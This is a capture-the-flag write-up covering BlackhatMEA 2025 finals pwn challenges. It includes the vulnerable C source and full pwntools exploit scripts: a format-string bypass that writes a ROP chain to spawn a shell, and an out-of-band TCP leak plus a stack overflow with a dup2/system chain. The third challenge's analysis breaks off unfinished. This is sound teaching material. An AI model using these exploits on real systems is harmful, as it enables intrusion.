Featured image of post blackhatMEA_finals_WP

blackhatMEA_finals_WP

BlackhatMEA2025 CTF FINALS forensics and pwn section

Last updated on:
|
|
|

day1

pwn

verifmt

a powerful verifier bro,that’s the Verifmt

analysis

All protections enabled, glibc2.39 environment, the challenge provided source code

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Check a user-supplied printf format string before it is used.
 *
 * Walks the string and counts every '%' that is not part of a "%%" pair.
 * Returns 1 (reject) when a '%' is directly followed by a digit, or when the
 * count would exceed n_args; returns 0 (accept) otherwise.
 *
 * Only the single character after '%' is inspected, so a '*' width is not
 * counted here even though printf consumes an extra argument for it, and the
 * scan covers only the bytes up to the first NUL (strlen).
 */
int verify_fmt(const char *fmt, size_t n_args) {
  size_t argcnt = 0;
  size_t len = strlen(fmt);

  for (size_t i = 0; i < len; i++) {
    if (fmt[i] == '%') {
      /* "%%" is a literal percent sign: skip both characters. */
      if (fmt[i+1] == '%') {
        i++;
        continue;
      }

      /* A digit right after '%' is rejected (e.g. "%1$p" or "%10c"). */
      if (isdigit(fmt[i+1])) {
        puts("[-] Positional argument not supported");
        return 1;
      }

      /* Each remaining '%' counts as one specifier, regardless of how many
         arguments printf will actually consume for it. */
      if (argcnt >= n_args) {
        printf("[-] Cannot use more than %lu specifiers\n", n_args);
        return 1;
      }

      argcnt++;
    }
  }

  return 0;
}

/*
 * Interactive loop: read an argument count (at most 4), that many long
 * values, and a format string; if verify_fmt() accepts the string, pass it to
 * printf together with all four args slots.
 *
 * Returns 1 as soon as any scanf/fgets call fails; otherwise loops forever.
 */
int main() {
  size_t n_args;
  long args[4];
  char fmt[256];

  /* Unbuffered stdio so prompts and output appear immediately. */
  setbuf(stdin, NULL);
  setbuf(stdout, NULL);

  while (1) {
    /* Get arguments */
    printf("# of args: ");
    if (scanf("%lu", &n_args) != 1) {
      return 1;
    }

    if (n_args > 4) {
      puts("[-] Maximum of 4 arguments supported");
      continue;
    }

    /* Unused slots stay zero; the first n_args slots are filled from input. */
    memset(args, 0, sizeof(args));
    for (size_t i = 0; i < n_args; i++) {
      printf("args[%lu]: ", i);
      if (scanf("%ld", args + i) != 1) {
        return 1;
      }
    }

    /* Get format string */
    /* Discard the rest of the current input line before reading the format. */
    while (getchar() != '\n');
    printf("Format string: ");
    if (fgets(fmt, sizeof(fmt), stdin) == NULL) {
      return 1;
    }

    /* Verify format string */
    if (verify_fmt(fmt, n_args)) {
      continue;
    }

    /* Enjoy! */
    /* The user-controlled string is the format; all four slots are always
       passed, whatever n_args was. */
    printf(fmt, args[0], args[1], args[2], args[3]);
  }

  return 0;
}

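A `%` followed directly by a digit is rejected outright, but according to the printf specification a field width can also be supplied as an argument by writing `*`, and the verifier never checks for that.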

If the format string contains more conversion specifiers than n_args (which is capped at 4), the verifier rejects it and the loop starts over. So we need to use * to advance the argument offset, and because the count is unsigned, we cannot leak forward.

* is a placeholder for extracting parameters. Using a reasonable payload, we can legitimately occupy the args parameters while still ensuring that the number of % and read parameters remains within the limit.

For leaking addresses, refer to 🚀’s blog
In the end, the program prints the format string with at most 4 arguments. You can also inject a \0 character to bypass the verification, then use %hhn to overwrite that \0. The problem is that if we only use %* to pop parameters, the later r9 and r10 registers are nil, and the limit on the number of format specifiers means the leaked address is nil as well. Therefore, we use three %*c to consume 6 parameters, so that the final %p prints a stack pointer. Based on this, we can write the byte-write primitive write_byte(addr, val):

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
def send_payload(n_args, args_list, fmt_str):
    """Play one round of the challenge menu: argument count, each argument, then the format string."""
    count_line = f"{n_args}".encode()
    io.sendlineafter(b"# of args: ", count_line)
    # Fill the args array, one prompt per slot.
    for slot in range(n_args):
        prompt = f"args[{slot}]: ".encode()
        value_line = f"{args_list[slot]}".encode()
        io.sendlineafter(prompt, value_line)
    io.sendlineafter(b"Format string: ", fmt_str)

def write_byte(addr, val):
    """
    Write one byte to *addr* using the format string %*c%hhn.

    args[0] = value to write (used as the field width)
    args[1] = 0 (the char printed by %c)
    args[2] = target address (the pointer consumed by %hhn)
    """
    # To write 0x00 we must print 0x100 (256) characters; %hhn truncates the
    # count to 0x00 (tip from 小伞).
    width = 256 if val == 0 else val

    # %*c consumes args[0] and args[1]; %hhn consumes args[2].
    # n_args may be 3 or 4; 4 is used here.
    send_payload(4, [width, 0, addr, 0], b"%*c%hhn")

Finally, when writing, we use the leaked stack pointer to point to the return address for writing. Since there is a while loop, we have enough write opportunities; we just need to write one byte at a time to the address.

exp

I don’t know why the local docker can’t connect, even though the libc is pulled from the container.

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
import argparse
import sys

from pwn import *

parser = argparse.ArgumentParser()
parser.add_argument(
    "mode",
    type=int,
    choices=[0, 1, 2],
    nargs="?",
    default=0,
    help="0=local,1=local+gdb,2=remote",
)
args = parser.parse_args()

filename = "./chall"
libc_name = "./libc.so.6"
arch = "amd64"
remote_addr = "localhost"
remote_port = "13337"


context(log_level="debug", os="linux", arch=arch)  
if args.mode < 2:
    context.terminal = ["tmux", "splitw", "-h"]

def VIO_TEXT(x, code=95):
    """Log *x* at info level, wrapped in the ANSI colour escape *code* (default 95)."""
    coloured = "\x1b[{}m{}\x1b[0m".format(code, x)
    return log.info(coloured)

def CLEAR_TEXT(x, code=32):
    """Log *x* as a success message, wrapped in the ANSI colour escape *code* (default 32)."""
    coloured = "\x1b[{}m{}\x1b[0m".format(code, x)
    return log.success(coloured)

# Open the target according to the selected mode:
#   0 = local process, 1 = local process with gdb attached, 2 = remote socket.
if args.mode == 0:
    io = process(filename)
    # CLEAR_TEXT logs the message itself; wrapping it in print() only added a
    # stray "None" line because the helper returns the logger's result.
    CLEAR_TEXT("[*] Running on local machine")
elif args.mode == 1:
    io = process(filename)
    gdb.attach(
        io,
        gdbscript="""
        """,
    )
elif args.mode == 2:
    io = remote(remote_addr, remote_port)
else:
    sys.exit(1)

# Load the binaries for symbol lookups; fall back to the ELF's own libc when
# no explicit libc path is configured.
elf = ELF(filename, checksec=False)
if libc_name:
    libc = ELF(libc_name, checksec=False)
else:
    libc = elf.libc


def send_payload(n_args, args_list, fmt_str):
    """Play one round of the challenge menu: argument count, each argument, then the format string."""
    count_line = f"{n_args}".encode()
    io.sendlineafter(b"# of args: ", count_line)
    # Fill the args array, one prompt per slot.
    for slot in range(n_args):
        prompt = f"args[{slot}]: ".encode()
        value_line = f"{args_list[slot]}".encode()
        io.sendlineafter(prompt, value_line)
    io.sendlineafter(b"Format string: ", fmt_str)


def write_byte(addr, val):
    """
    Write one byte to *addr* using the format string %*c%hhn.

    args[0] = value to write (used as the field width)
    args[1] = 0 (the char printed by %c)
    args[2] = target address (the pointer consumed by %hhn)
    """
    # To write 0x00 we must print 0x100 (256) characters; %hhn truncates the
    # count to 0x00 (tip from 小伞).
    width = 256 if val == 0 else val

    # %*c consumes args[0] and args[1]; %hhn consumes args[2].
    # n_args may be 3 or 4; 4 is used here.
    send_payload(4, [width, 0, addr, 0], b"%*c%hhn")


# Leak addresses: a stack pointer first, then PIE and libc via arbitrary read.
VIO_TEXT("Sending payload to leak addresses...")

# Offset from the leaked stack pointer to main's saved return address. The
# same slot is read for the libc leak and later overwritten with the ROP chain.
OFFSET_TO_RET = 0x170


def leak_qword(addr):
    """Read the NUL-terminated bytes stored at *addr* with %s and return them as an integer."""
    send_payload(4, [0, 0, addr, 0], b"B%*c%sEND")
    io.recvuntil(b"B")
    raw = io.recvuntil(b"END", drop=True)
    # %*c with width 0 and char 0 prints a single NUL byte ahead of the %s
    # data. Drop only that byte: a generic strip() would also delete address
    # bytes that happen to be ASCII whitespace (0x09-0x0d, 0x20).
    if raw.startswith(b"\x00"):
        raw = raw[1:]
    return u64(raw[:7].ljust(8, b"\x00"))


# 1. Leak a stack address (three %*c skip the nil arguments; idea from
#    RocketMadev's blog). Expected to print argument 7 ([RSP+16] or nearby).
args_leak_stack = [3, 0, 0, 0]
fmt_stack = b"AAAA%*c%*c%*c%p"
send_payload(4, args_leak_stack, fmt_stack)
io.recvuntil(b"AAAA")
io.recvuntil(b"0x")
stack_leak = int(io.recvline().strip(), 16)
CLEAR_TEXT(f"Leaked stack address: {hex(stack_leak)}")

# 2. Arbitrary read of a code pointer stored on the stack -> PIE base.
pie_base = leak_qword(stack_leak - 0x20) - 0x12F6
CLEAR_TEXT(f"Calculated PIE base address: {hex(pie_base)}")

# 3. Arbitrary read of main's return address -> libc base.
raw_leak_libc = leak_qword(stack_leak + OFFSET_TO_RET)
# pause()  # debugging aid: uncomment to stop here and attach a debugger
libc_base = (
    raw_leak_libc - 0x2718a
)  # offset of __libc_start_call_main+122; may need fine-tuning per libc build
CLEAR_TEXT(f"Calculated Libc base address: {hex(libc_base)}")

# ROP payload
VIO_TEXT("Constructing ROP chain...")

# Location of the return address that the chain will overwrite.
ret_addr_ptr = stack_leak + OFFSET_TO_RET
CLEAR_TEXT(f"ROP Chain Start Ptr: {hex(ret_addr_ptr)}")

pop_rdi_ret = pie_base + 0x1282
CLEAR_TEXT(f"pop rdi; ret address: {hex(pop_rdi_ret)}")

bin_sh_addr = libc_base + 0x0000000000196031
CLEAR_TEXT(f"/bin/sh address: {hex(bin_sh_addr)}")
system_addr = libc_base + 0x4C330
ret_addr = pie_base + 0x101A  # lone `ret`, used for stack alignment
CLEAR_TEXT(f"system address: {hex(system_addr)}")
ROP_CHAIN = [
    pop_rdi_ret,
    bin_sh_addr,
    ret_addr,
    system_addr,
]
VIO_TEXT("Writing ROP Chain byte-by-byte...")

# Each chain entry is written as 8 little-endian bytes, one %hhn write per byte.
for slot, gadget in enumerate(ROP_CHAIN):
    for i, byte_to_write in enumerate(p64(gadget)):
        write_byte(ret_addr_ptr + 8 * slot + i, byte_to_write)

CLEAR_TEXT("ROP Chain written successfully.")

VIO_TEXT("Triggering the overwritten return address...")

# pause()
# Send a non-numeric token so scanf fails and main returns into the ROP chain.
io.sendlineafter(b"# of args: ", b"#")

io.interactive()

StackPrelude

A prelude, ready to meet the impossible stack overflow challenge

analysis

Analyze the source code

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
#define _GNU_SOURCE 
#include <stdio.h>      // 标准输入/输出库,用于 perror
#include <stdlib.h>     // 标准库,用于 atoi
#include <netinet/in.h> // 包含 sockaddr_in 结构体和 IP 宏定义
#include <sys/socket.h> // 包含 socket, bind, listen, accept 等函数
#include <sys/types.h>  // 包含基本系统数据类型
#include <unistd.h>     // 包含 close 函数

/*
 * Single-connection TCP echo server: accept one client, then repeatedly read
 * a length followed by that many bytes and send the same number of bytes back.
 *
 * Returns 0 when the echo loop ends and 1 when socket setup fails.
 */
int main(int argc, char **argv) {
    // Client address (cli) and server address (addr); addr is zero-initialized with {0}
    struct sockaddr_in cli, addr = {0}; 
    socklen_t clen;         // length of the client address structure
    int cfd;                // client file descriptor
    int sfd = -1;           // server (listening) file descriptor; -1 means not created yet or failed
    int yes = 1;            // option value passed to setsockopt() (enable)
    ssize_t n;              // length announced by the client; used as the byte count for recv/send
    char buf[0x100];        // stack buffer of 256 bytes (0x100) that receives the client's data
    // Port selection: default to 31337 when no argument is given, otherwise use the first argument
    unsigned short port = argc < 2 ? 31337 : atoi(argv[1]);

    // 1. Create the socket
    // AF_INET: IPv4 address family; SOCK_STREAM: TCP (stream socket); 0: default protocol
    if ((sfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        perror("socket"); // print the error message
        goto err;
    }

    // 2. Set a socket option: address reuse
    // SOL_SOCKET: socket-level option; SO_REUSEADDR: allow the local address to be reused so that
    // connections left in TIME_WAIT do not make bind fail.
    // Even if a previous process left TIME_WAIT connections on the port, a new process can start
    // and bind to it immediately, which makes restarting the server much faster.
    if (setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(yes)) < 0) {
        perror("setsockopt(SO_REUSEADDR)");
        goto err;
    }

    // 3. Fill in the server address structure
    addr.sin_family = AF_INET;
    // htonl(): host-to-network byte order (32 bit); INADDR_ANY: listen on all local interfaces (0.0.0.0)
    addr.sin_addr.s_addr = htonl(INADDR_ANY);
    // htons(): host-to-network byte order (16 bit); sets the listening port
    addr.sin_port = htons(port);

    // 4. Bind the address and port to the socket
    if (bind(sfd, (struct sockaddr*)&addr, sizeof(addr)) < 0) {
        perror("bind");
        goto err;
    }

    // 5. Start listening for connections
    // Puts the socket in passive mode; the backlog argument is 1 (maximum pending-connection queue length)
    if (listen(sfd, 1) < 0) {
        perror("listen");
        goto err;
    }

    // 6. Accept a client connection
    clen = sizeof(cli);
    // Blocks until a client connects; on success returns a new descriptor cfd used for the conversation
    if ((cfd = accept(sfd, (struct sockaddr*)&cli, &clen)) < 0) {
        perror("accept");
        goto err;
    }

    // 7. Data-processing loop (echo loop)
    while (1) {
        n = 0;
        // First receive: the data length (ssize_t, typically 8 bytes)
        // MSG_WAITALL: ask recv to return only after sizeof(ssize_t) bytes have arrived
        // (the return value is not checked)
        recv(cfd, &n, sizeof(ssize_t), MSG_WAITALL);
        
        // Exit conditions:
        // n <= 0: the client disconnected or sent an invalid length
        // n >= 0x200 (512): length too large -- but note that lengths up to 0x1ff
        // pass this check while buf is only 0x100 bytes
        if (n <= 0 || n >= 0x200) 
            break;

        // Second receive: read n bytes into buf
        // MSG_WAITALL: ask recv to return only after n bytes have arrived
        // (the return value is not checked, so a short receive goes unnoticed)
        recv(cfd, buf, n, MSG_WAITALL);
        
        // Echo n bytes of buf back, regardless of how many were actually received
        send(cfd, buf, n, 0); 
    }

    return 0;

err:
    // Error label: any failing setup step jumps here
    if (sfd >= 0) close(sfd); // close sfd if it was created successfully
    return 1; 
}

The key to this problem is how to keep the remote connection usable while still leaking a large amount of data. The socket server built here handles only one connection, and it sends the data back after receiving it. Let's briefly review some computer networking.

The first idea is to use the half-close feature of TCP. During the four-way teardown we first send a client-side half-close FIN packet. At this point the connection is not fully closed, which makes the server's recv return 0 despite MSG_WAITALL and close the cfd. However, this requires closing our sending direction, so even if we can leak data we cannot keep interacting. This approach is therefore rejected.

The second idea is to use an interrupting signal. With OOB (out-of-band) data, sending an urgent byte triggers the SIGURG signal on the server side. Since this is an asynchronous signal, it interrupts the recv call, while send still returns data of the requested length, and we can still continue interacting!

Interaction and exp

First, let’s talk about how to interact and debug the challenge.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
parser.add_argument(
    "mode", type=int, choices=[0, 1, 2], nargs="?", default=0,
    help="0=local, 1=local+gdb, 2=remote. (Default: 0)",
)

parser.add_argument(
    "-T", "--threads", type=int, default=None, 
    help="Thread count for remote connections (Overrides 'mode')."
)
args = parser.parse_args()
#...
def launch():
    """Open the target and return it: a list of remotes when -T is given, otherwise a single tube chosen by mode."""
    global io, threads
    process_argv = [filename, str(remote_port)]

    # -T takes precedence over the positional mode.
    if args.threads is not None:
        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")

        conns = []
        for _ in range(args.threads):
            conns.append(remote(remote_addr, remote_port, ssl=False))
        threads = conns
        CLEAR_TEXT(f"[*] Started {args.threads} remote threads on {remote_addr}:{remote_port}")
        return threads

    if args.mode == 0:
        # Plain local process.
        io = process(process_argv)
        CLEAR_TEXT("[*] Running on local machine (mode 0)")
        return io

    if args.mode == 1:
        # Local process with a debugger attached.
        io = process(process_argv)
        CLEAR_TEXT("[*] Running on local machine with GDB (mode 1)")
        gdb.attach(io, gdbscript="""
        """)
        return io

    if args.mode == 2:
        # Remote target.
        io = remote(remote_addr, remote_port)
        CLEAR_TEXT(f"[*] Running on remote: {remote_addr}:{remote_port} (mode 2)")
        return io

    sys.exit(1)

#...

if __name__ == "__main__":
    target = launch()

    if args.threads is None:
        # Single-connection mode: hand the tube straight to the user.
        io = target
        VIO_TEXT("--- Single Connection Exploit Mode Active ---")

        io.interactive()
    else:
        # -T mode: launch() returned a list of remote connections.
        threads = target
        VIO_TEXT("--- Multi-Threaded Exploit Mode Active ---")
        if threads:
            VIO_TEXT("Entering interactive mode on the first thread for manual control...")
            main(threads)

The above is my script. When debugging locally, first open the program and pwndbg, establish an io, then open a new process for connection and interaction.

1
2
python exp_thread.py 1 
python exp_thread.py -T 1

Then we can interact on the interface opened by pwndbg.

The specific situation is as shown. After debugging, after we send data and open recv, in the second step we can find the following situation:
The socket uses fd 4 as a fixed interaction handle. If we want normal interaction with the target machine after opening a shell, we need to use dup2 to duplicate that fd onto stdout (and likewise stdin or stderr); otherwise there is no echo, because the shell started by system("/bin/sh") is attached directly to the server's own standard streams rather than to our socket.

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
import argparse
import sys
from pwn import *
# --------------------------
# 1. 命令行参数定义
# --------------------------
parser = argparse.ArgumentParser(description="Pwn Exploit Script with multi-mode and multi-thread support.")

parser.add_argument(
    "mode", type=int, choices=[0, 1, 2], nargs="?", default=0,
    help="0=local, 1=local+gdb, 2=remote. (Default: 0)",
)
parser.add_argument(
    "-T", "--threads", type=int, default=None, 
    help="Thread count for remote connections (Overrides 'mode')."
)
args = parser.parse_args()

# --- 配置信息 ---
filename = "./chall"
libc_name = "./libc.so.6"
arch = "amd64"
remote_addr = "172.23.0.2" #NOTE:这里要注意不能用docker的回环地址 
remote_port = 5000 
# remote_addr = "localhost" 
# remote_port = 13337

context(log_level="info", os="linux", arch=arch)

# 仅在 local/gdb 模式下,且没有使用线程模式时设置 terminal
if args.mode < 2 and args.threads is None:
    context.terminal = ["tmux", "splitw", "-h"]

elf = ELF(filename, checksec=False)
if libc_name:
    libc = ELF(libc_name, checksec=False)

def VIO_TEXT(x, code=95):
    """Log *x* at info level, wrapped in the ANSI colour escape *code* (default 95)."""
    coloured = "\x1b[{}m{}\x1b[0m".format(code, x)
    return log.info(coloured)

def CLEAR_TEXT(x, code=32):
    """Log *x* as a success message, wrapped in the ANSI colour escape *code* (default 32)."""
    coloured = "\x1b[{}m{}\x1b[0m".format(code, x)
    return log.success(coloured)

def launch():
    """Open the target and return it: a list of remotes when -T is given, otherwise a single tube chosen by mode."""
    global io, threads
    process_argv = [filename, str(remote_port)]

    # -T takes precedence over the positional mode.
    if args.threads is not None:
        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")

        conns = []
        for _ in range(args.threads):
            conns.append(remote(remote_addr, remote_port, ssl=False))
        threads = conns
        CLEAR_TEXT(f"[*] Started {args.threads} remote threads on {remote_addr}:{remote_port}")
        return threads

    if args.mode == 0:
        # Plain local process.
        io = process(process_argv)
        CLEAR_TEXT("[*] Running on local machine (mode 0)")
        return io

    if args.mode == 1:
        # Local process with a debugger attached.
        io = process(process_argv)
        CLEAR_TEXT("[*] Running on local machine with GDB (mode 1)")
        gdb.attach(io, gdbscript="""
        """)
        return io

    if args.mode == 2:
        # Remote target.
        io = remote(remote_addr, remote_port, ssl=False)
        CLEAR_TEXT(f"[*] Running on remote: {remote_addr}:{remote_port} (mode 2)")
        return io

    sys.exit(1)

# 先python 1启动一个终端进行开启进程和gdb调试,然后再在另一个终端进行数据交互
def main(threads):
    """Leak the canary and a libc pointer with an out-of-band byte, then send a ROP chain.

    Uses only the first connection in *threads*. The chain calls dup2 twice
    with fd 4 as the source (targets 0 and 1) and then system("/bin/sh").
    """
    leak_len = 0x180

    # The first connection does both the leak and the attack.
    t0 = threads[0]

    # Announce a 0x180-byte message, then send two bytes flagged MSG_OOB instead
    # of the full body; the server replies with leak_len bytes of its stack.
    t0.sendline(flat(leak_len))
    t0.sock.send(b"A" * 2, constants.MSG_OOB)
    # or
    # with sock.out_of_band():
    #     sock.send(b"A" * 2)

    # Wait for the complete reply: a bare recv() may return a partial read,
    # and the offsets below need every byte up to 0x120.
    data = t0.recvn(leak_len)

    canary = int.from_bytes(data[0x108:0x110], "little")
    libc.address = int.from_bytes(data[0x118:0x120], "little") - 0x2a1ca

    CLEAR_TEXT(f"[*] Leaked Canary: {hex(canary)}")
    CLEAR_TEXT(f"[*] Leaked Libc Base: {hex(libc.address)}")

    t0.sendline(flat(0x188))

    VIO_TEXT("[*] Sending ROP payload...")
    pop_rdi_ret = libc.address + 0x000000000010f78b
    pop_rsi_ret = libc.address + 0x0000000000110a7d
    ret_addr = libc.address + 0x000000000002882f
    # Every offset is shifted by -1; presumably this compensates for the
    # newline that sendline() appended after the length -- confirm when
    # changing how the length is sent.
    payload = flat({
        0x108-1: canary,
        0x118-1: pop_rdi_ret,
        0x120-1: 4,  # fd
        0x128-1: pop_rsi_ret,  # 0 (the next slot is left as zero filler)
        0x138-1: libc.sym['dup2'],
        0x140-1: pop_rdi_ret,
        0x148-1: 4,
        0x150-1: pop_rsi_ret,
        0x158-1: 1,
        0x160-1: libc.sym['dup2'],
        0x168-1: ret_addr,
        0x170-1: pop_rdi_ret,
        0x178-1: next(libc.search(b"/bin/sh\x00")),
        0x180-1: libc.sym['system'],
    }, filler=b"\x00").ljust(0x188, b"\x00")
    t0.send(payload)
    # A zero length makes the server leave its echo loop and return into the chain.
    t0.sendline(p64(0))
    t0.interactive()

if __name__ == "__main__":
    target = launch()

    if args.threads is None:
        # Single-connection mode.
        io = target
        VIO_TEXT("--- Single Connection Exploit Mode Active ---")
        main([io])  # main() expects a list, so wrap the single tube
        io.interactive()
    else:
        # -T mode: launch() returned a list of remote connections.
        threads = target
        VIO_TEXT("--- Multi-Threaded Exploit Mode Active ---")
        if threads:
            VIO_TEXT("Entering interactive mode on the first thread for manual control...")
            main(threads)

tips:

Note that when we interact with the Docker target machine, we cannot connect through the loopback address (lo); we must connect to the container's IP on the Docker internal (bridge) network. The reason is that, when OOB data is involved, Docker does two things when mapping ports:

  • Set iptables rules: Direct traffic from the host port to the Docker bridge network.
  • Start docker-proxy process: docker-proxy or similar components (such as userland-proxy) run on the host, listening on the host port and forwarding traffic to the container’s internal IP and port. If we start the loopback address lo, the kernel will find that the target address is 127.0.0.1, which may optimize TCP frames, skip checksums, etc. The data will not go through the normal application -> transport -> network -> link layer, but will be captured at the network layer. docker-proxy, when processing loopback traffic, will not fully maintain TCP frames and flags, thus causing the OOB attack to fail when setting the URG pointer due to optimization of TCP frame flags, and failing to trigger the recv interrupt and leak data. Therefore, we must use the Docker bridge network interface.

day2

pwn

Stack_Impromptu

The word "impossible" is not in my dictionary

analysis

All protections enabled. First, audit the source code. main.cpp:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
#include <pthread.h>

// Report msg via perror() and terminate only the calling thread.
void fatal(const char *msg) {
  perror(msg);
  pthread_exit(NULL);
}

// Echo one length-prefixed message on the connection referred to by fd.
//
// Reads a size_t length, then up to that many bytes into buf, and writes
// `size` bytes of buf back. Returns 0 on success; on failure it closes fd and
// calls fatal(), which ends the calling thread.
//
// fd is taken by reference, so close(fd) uses whatever value the caller's
// variable holds at that moment.
int server_read(int &fd){
  size_t size;
  char buf[0x40];

  memset(buf, 0, sizeof(buf));
  // Lengths up to 0x100 are accepted although buf holds only 0x40 bytes, so
  // the second read() can write past the end of buf.
  // NOTE(review): read() returns ssize_t; compared against the unsigned
  // `size`, an error result of -1 presumably converts to a huge value and does
  // not take the error path -- confirm.
  if (read(fd, &size, sizeof(size)) != sizeof(size)
      || size > 0x100
      || read(fd, buf, size) < size)
    goto err;

  // Always sends `size` bytes starting at buf, whatever its real capacity.
  write(fd, buf, size);
  return 0;

err:
  close(fd);
  fatal("Could not receive data (read)");
  return 1;
}

// Thread entry point: arg carries the accepted socket descriptor as an
// integer. Calls server_read() on it until it returns non-zero.
void* server_main(void* arg) {
  int fd = (int)((intptr_t)arg);  // local copy; server_read receives it by reference
  while (server_read(fd) == 0);
  return NULL;
}

// TCP server: listen on the given port (default 31337) and start one detached
// thread running server_main() for every accepted connection.
// Returns 1 when socket setup or accept() fails.
int main(int argc, char** argv) {
  pthread_t th;
  struct sockaddr_in cli, addr = { 0 };
  socklen_t clen;
  int cfd, sfd = -1, yes = 1;
  unsigned short port = argc < 2 ? 31337 : atoi(argv[1]);

  if ((sfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
    perror("socket");
    goto err;
  }

  // Allow the listening address to be reused.
  if (setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(yes)) < 0) {
    perror("setsockopt(SO_REUSEADDR)");
    goto err;
  }

  // Listen on every local interface.
  addr.sin_family = AF_INET;
  addr.sin_addr.s_addr = htonl(INADDR_ANY);
  addr.sin_port = htons(port);

  if (bind(sfd, (struct sockaddr*)&addr, sizeof(addr)) < 0) {
    perror("bind");
    goto err;
  }

  if (listen(sfd, 5) < 0) {
    perror("listen");
    goto err;
  }

  // Accept loop: each client is served by its own thread.
  while (1) {
    clen = sizeof(cli);
    if ((cfd = accept(sfd, (struct sockaddr*)&cli, &clen)) < 0) {
      perror("accept");
      goto err;
    }

    // The descriptor is passed by value inside the pointer argument; the
    // thread is detached right away and never joined.
    pthread_create(&th, NULL, server_main, (void*)((intptr_t)cfd));
    pthread_detach(th);
  }

  return 0;

err:
  if (sfd >= 0) close(sfd);
  return 1;
}

When a new connection cfd is accepted, the server calls pthread_create to start a thread for it and then pthread_detach, so that the thread's resources are released automatically when it exits. Obviously, this is a multi-threaded challenge. We cannot directly leak any memory content from within a single thread. The key lies in server_main and server_read.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
// Echo one length-prefixed message on the connection referred to by fd.
//
// Reads a size_t length, then up to that many bytes into buf, and writes
// `size` bytes of buf back. Returns 0 on success; on failure it closes fd and
// calls fatal().
//
// fd is taken by reference, so close(fd) uses whatever value the caller's
// variable holds at that moment.
int server_read(int &fd){
  size_t size;
  char buf[0x40];

  memset(buf, 0, sizeof(buf));
  // Lengths up to 0x100 are accepted although buf holds only 0x40 bytes, so
  // the second read() can write past the end of buf.
  // NOTE(review): read() returns ssize_t; compared against the unsigned
  // `size`, an error result of -1 presumably converts to a huge value and does
  // not take the error path -- confirm.
  if (read(fd, &size, sizeof(size)) != sizeof(size)
      || size > 0x100
      || read(fd, buf, size) < size)
    goto err;

  // Always sends `size` bytes starting at buf, whatever its real capacity.
  write(fd, buf, size);
  return 0;

err:
  close(fd);
  fatal("Could not receive data (read)");
  return 1;
}

// Thread entry point: arg carries the accepted socket descriptor as an
// integer. Calls server_read() on it until it returns non-zero.
void* server_main(void* arg) {
  int fd = (int)((intptr_t)arg);  // local copy; server_read receives it by reference
  while (server_read(fd) == 0);
  return NULL;
}

server_read has a stack overflow and will be called continuously, but unlike the previous problem, this one does not have MSG_WAITALL to allow us to use interrupt signals to leak information.

Pthread multi-threading: all threads run in the same process space and share global variables, heap space, file descriptors. Each thread only has its own independent stack!

Pthread has vulnerabilities. Due to memory sharing, an overflow in one thread can tamper with data of other threads, leading to control of the entire process or a crash. During the competition, I had no idea for this problem. Strict requirements on input format and data size made it unclear how to achieve a leak. AI only suggested trying to use data to overwrite memory space of other threads, and multi-thread debugging is not simple, mainly considering interaction timing issues. Fortunately, after the competition, I saw a hint from a master in Discord who solved it:
